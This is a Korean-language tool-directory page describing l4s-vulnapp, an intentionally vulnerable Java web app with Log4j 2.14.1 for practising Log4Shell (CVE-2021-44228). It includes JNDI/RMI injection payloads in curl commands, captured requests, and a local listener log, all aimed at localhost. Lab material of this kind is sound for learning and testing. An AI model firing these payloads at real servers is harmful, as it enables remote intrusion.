Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
l4s-vulnapp — log4shell(CVE-2021-44228)에 영향을 받는 Log4j를 포함한 잠재적으로 취약한 Java 웹 애플리케이션입니다. | Kitploit
도구/GitHubGitHub/ktokkawu/l4s-vulnapp
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubktokkawu/l4s-vulnapp

l4s-vulnapp

log4shell(CVE-2021-44228)에 영향을 받는 Log4j를 포함한 잠재적으로 취약한 Java 웹 애플리케이션입니다.

저장소 보기
2년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Log4Shell 취약 애플리케이션(l4s-vulnapp)

이는 Log4j(2.14.1)를 포함한 잠재적으로 취약한 Java 웹 애플리케이션으로, log4shell(CVE-2021-44228)의 영향을 받습니다.

검증된 환경 및 다양한 버전

  • AdoptOpenJDK 17.0.10+7
  • Gradle 8.6
  • Gretty 4.1.2
  • Apache Tomcat 10.1.15
  • Apache Log4j Core 2.14.1

준비 사항

  • AdoptOpenJDK zip 파일을 다운로드하여 압축을 풉니다.
  • PATH 및 JAVA_HOME 변수를 설정합니다.
  • java --version 명령을 실행하여 AdoptOpenJDK가 제대로 작동하는지 확인합니다.

[참고]
JDK 버전, Tomcat 포트 등을 변경하려면 build.gradle을 편집하세요.

빌드 및 실행

build.gradle과 함께 Gradle 래퍼를 실행합니다.

root@kitploit:~
# on Linux
./gradlew appRun

# on Windows
.\gradlew.bat appRun

최상위 URL:

root@kitploit:~
http://localhost:8080/l4s-vulnapp/

[참고]
Log4Shell은 앱이 일부 Log4j 로깅을 수행할 때만 트리거됩니다.
예를 들어, 다음 URL에 접근하면 Log4Shell이 실행됩니다.

root@kitploit:~
http://localhost:8080/l4s-vulnapp/servlet

Log4Shell은 접근 시 'x-param' 값을 조작하거나 HTTP 요청에 'x-log' 헤더를 추가하여 확인할 수 있습니다.
이러한 매개변수는 Log4j에 의해 로깅됩니다.
단, 이는 localhost:8081에서 수신 서버가 실행 중인 경우에만 가능합니다.

root@kitploit:~
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D

검증 결과

  • HTTP 요청

    root@kitploit:~
    GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
    Host: localhost:8080
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/122.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/  *;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8080/l4s-vulnapp/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: ja,en-US;q=0.9,en;q=0.8
    
    
    
  • HTTP 응답

    root@kitploit:~
    HTTP/1.1 200
    Content-Type: text/plain;charset=utf-8
    Content-Length: 62
    Date: Fri, 15 Mar 2024 18:42:56 GMT
    Keep-Alive: timeout=60
    Connection: keep-alive
    
    Hello
    Logging to console using vulnerable Log4j2 by parameter
    
  • l4s-vulnapp의 RMI 요청

    root@kitploit:~
    2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
    2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
    2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
    2024/03/16 03:42:55: [Hex data] ===== start =====
    2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
    2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    2024/03/16 03:42:56: [Hex data] =====  end  =====
    2024/03/16 03:42:56: [Raw data] ===== start =====
    2024/03/16 03:42:56: JRMI
    2024/03/16 03:42:56: [Raw data] =====  end  =====
    

옵션

l4s-ls.ps1은 수신 서버를 시작합니다. 이 스크립트를 Windows PowerShell/명령 프롬프트에서 실행하세요.
이 서버는 LDAP 및 RMI와 같은 바이너리 통신을 수신하고, 해당 통신의 내용을 Hex 및 Raw로 표시할 수 있습니다.
스크립트가 오작동하는 경우 Ctrl + C를 사용하여 중지하세요.

[주의]
이 스크립트를 처음 실행할 때 Windows 팝업에서 '개인 네트워크'를 선택해야 합니다.

root@kitploit:~
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081

참고 자료

  • GitHub - tothi/log4shell-vulnerable-app
  • ももいろテクノロジー - PowerShellでnc(netcat)を書いてみる (2015/4/16)
도구 다운로드